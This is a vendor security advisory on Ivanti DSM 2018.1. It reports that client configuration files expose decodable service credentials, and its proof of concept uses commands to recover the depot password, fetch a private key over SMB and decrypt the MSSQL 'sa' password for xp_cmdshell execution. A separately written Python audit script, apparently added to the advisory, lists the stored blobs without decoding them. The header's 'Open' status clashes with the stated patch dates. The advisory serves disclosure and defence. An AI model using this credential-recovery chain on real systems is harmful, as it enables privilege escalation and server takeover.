Advisory ID: SYSS-2019-019
Product: Ivanti DSM
Manufacturer: Ivanti
Affected Version(s): 2018.1
Tested Version(s): 2018.1
Vulnerability Type: Insufficiently Protected Credentials (CWE-522)
                    Use of Hard-coded Cryptographic Key (CWE-321)
                    Violation of Secure Design Principles (CWE-657)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: 2020-04-01
Public Disclosure: 2021-10-15
CVE Reference: None assigned
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Ivanti DSM (formerly HEAT and Frontrange DSM) is an enterprise software
deployment solution.

The manufacturer describes the product as follows (see [1]):

"IVANTI Desktop & Server Management (IVANTI DSM) is a multi-platform
unified endpoint management solution that automatically packages and
deploys software and operating systems, patches vulnerabilities,
discovers software and hardware assets, and efficiently manages Windows
OS migrations, virtual environments, Citrix server farms, and more. The
DSM suite contains all the tools necessary to manage and secure endpoints
from a unified, intuitive console."

In certain configurations, an unprivileged user of a managed client
system, or malware running in that user's context, can gain access to
sensitive cryptographic key material and thereby to the credentials of
the service accounts in use, which allows for privilege escalation
attacks.

A similar security issue affecting previous software versions and another
supported password format was found and reported by SySS several years
ago ([2], [3]). This security advisory concerns the newly introduced
password formats for storing service credentials.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If the same user account is configured for "Depot Access" and
"Distribution Service", the credentials of these high-privilege accounts
are exposed to an attacker or malware with access to the managed client
system.

The credentials of the "Depot Access" account are stored in obfuscated
form, readable by everybody, on each managed client system in the
NiCfg*.ncp configuration files. Password information stored in the k4
password format within those configuration files can be decoded to
cleartext without any further information.

The "Distribution Service" account, by default, not only grants write
access to the depot share, but also read access to the sensitive key
material stored at "config/key/private.key". This file contains the key
material used in the k6 password format.

By knowing the k6 algorithm in use and by having access to the
cryptographic key, an attacker can decrypt the stored password
information of the configuration files NiCfg*.ncp and thus gain
unauthorized access to further service credentials, for instance those
of the database server. In the default configuration, this would be an
MSSQL 'sa' account, ultimately allowing command execution on the server
system.

Besides manual configuration, two installation modes yield this result:
"Basic installation", which is documented as being for testing only, but
also the option "Use this account for all accounts except for the Runtime
Service".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH developed a software tool for recovering password information
of Ivanti DSM stored in the different supported password formats such as
k4 and k6.

The following example demonstrates the successful password recovery of a
k4 password.
$ strings NiCfgLcl.ncp | egrep -B1 '(^k4|\{)'
rpcss/esiCore
{EC2082A7-25F5-4E8C-AAA1-7316D1210E3E}
--
ivantiall
k4uW1qpQj5ml6B4Q7+Y6R14CgVxd9NDkcUez3a5bcbcZtofYKc1pqyNE6nUWpbddYYdMTs7Q==

The password can be recovered using a software tool developed in-house
which implements the corresponding decryption routine.

> DSM --guid {EC2082A7-25F5-4E8C-AAA1-7316D1210E3E} k4[...]
Decrypted: ivantiall

This recovered password can then be used to connect to the depot share
from which the private key used for storing k6 password information can
be retrieved. Other manipulations, for example replacing executables on
that share, are also possible.

$ smbclient '//192.168.56.101/dsm$' -U ivantiall
Enter ivantiall's password: *ivantiall*
Domain=[DSMSERVER] OS=[Windows 10 Enterprise 17134] Server=[Windows 10 Enterprise 6.3]
smb: \> cd config/key/
smb: \config\key\> ls
  .                                   D        0  Fri Apr 26 14:24:28 2019
  ..                                  D        0  Fri Apr 26 14:24:28 2019
  private.key                         A     1024  Fri Apr 26 14:24:28 2019
  PrivilegedAccounts.txt              A       87  Fri Apr 26 14:24:28 2019
  Secured.txt                         A        0  Fri Apr 26 14:24:28 2019

                30591054 blocks of size 4096. 24745515 blocks available
smb: \config\key\> get private.key
getting file \config\key\private.key of size 1024 as private.key [...]

Now, the encrypted database credentials can be retrieved from the
configuration files.

$ strings NiCfgLcl.ncp | egrep -B1 '^k6'
Provider=SQLOLEDB;Network Library=DBMSSOCN;Initial Catalog=DSMDB;\
Application Name=DSM;Data Source=DSMSERVER\DSM
k6dzuhDzXpSOzxrdJWRQU++aF2LlSbIIyD7uLhc9M5lXdDC+fwBAcT+Bbt1pBwMY53tIB7/w==

And again, using the developed software tool and having access to the
private key file in use, further stored k6 passwords can be decrypted,
for instance the one of the user account 'sa' of the MSSQL database.

> DSM --keyfile private.key k6[...]
Decrypted: mysqlpass

For example, this password can then be used to connect to the Ivanti DSM
database and execute commands using 'xp_cmdshell'.
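As an added audit aid for this advisory (an illustration written here, not the SySS tool and not Ivanti code; it decodes nothing): a Python script that lists which k4 and k6 credential blobs a NiCfg*.ncp file carries and which account name or connection string precedes each one, so an administrator can see whether clients still hold credentials in the key-less k4 format. The sample bytes are constructed to mimic the strings output above; the NUL-separated layout and the base64-looking shape of the blobs are assumptions drawn from that output.

```python
import glob
import re
import sys
from collections import Counter

# Constructed sample imitating the printable strings of a NiCfg*.ncp dump as
# shown in the advisory; NUL separation is an assumption and values are fake.
SAMPLE_NCP = (
    b"rpcss/esiCore\x00{00000000-0000-0000-0000-000000000000}\x00"
    b"ivantiall\x00k4PLACEHOLDERPLACEHOLDERPLACEHOLDER==\x00"
    b"Provider=SQLOLEDB;Initial Catalog=DSMDB;Data Source=DSMSERVER\\DSM\x00"
    b"k6PLACEHOLDERPLACEHOLDERPLACEHOLDER==\x00\x01\x02\xff"
)
# Password formats named in the advisory and what (if anything) protects them
FORMAT_RISK = {
    "k4": "obfuscation only, decodable without any key",
    "k6": "encrypted with config/key/private.key held on the depot share",
}
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")                 # strings(1)-like runs
CRED_RE = re.compile(r"^(k[46])[A-Za-z0-9+/]{16,}={0,2}$")  # base64-looking blob

def printable_strings(data):
    """Printable ASCII runs of 4+ chars, like `strings` prints them."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(data)]

def find_stored_credentials(data):
    """One finding per k4/k6 blob; the preceding string is kept as context,
    which in the dumps above is the account name or the connection string."""
    strings = printable_strings(data)
    findings = []
    for i, s in enumerate(strings):
        m = CRED_RE.match(s)
        if m:
            fmt = m.group(1)
            findings.append({"format": fmt, "risk": FORMAT_RISK[fmt],
                             "context": strings[i - 1] if i else ""})
    return findings

def format_counts(findings):
    """Blobs per format; any k4 count > 0 means key-less recovery is possible."""
    return Counter(f["format"] for f in findings)

if __name__ == "__main__":
    for path in sys.argv[1:] or glob.glob("NiCfg*.ncp"):
        with open(path, "rb") as fh:
            for f in find_stored_credentials(fh.read()):
                print(f"{path}: {f['format']} for '{f['context']}' ({f['risk']})")
```

Run it on a client with the NiCfg*.ncp files as arguments; any k4 finding for a depot account is the configuration the advisory warns about.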
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Use a distinct low-privilege account or machine accounts for depot
access. Do not expose sensitive values to client systems unnecessarily.

The Ivanti DSM Version 2020.1 installer more prominently warns about the
dangers of shared account configurations. Also, a support article is
available at [6] (for customers only) detailing secure service account
setup.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-26: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2020-04-01: Patch released by manufacturer
2021-10-15: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Ivanti DSM
    https://www.ivanti.de/products/desktop-and-server-management
[2] SySS Security Advisory SYSS-2014-007
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2014-007.txt
[3] Matthias Deeg, Privilege Escalation via Client Management Software,
    SySS GmbH, 2015
    https://www.syss.de/fileadmin/dokumente/Publikationen/2015/Privilege_Escalation_via_Client_Management_Software.pdf
[4] SySS Security Advisory SYSS-2019-019
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-019.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[6] Ivanti Support Article (Customer account required)
    https://forums.ivanti.com/s/article/DSM-Services-User-Accounts-Overview-Security-best-practices

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.
E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en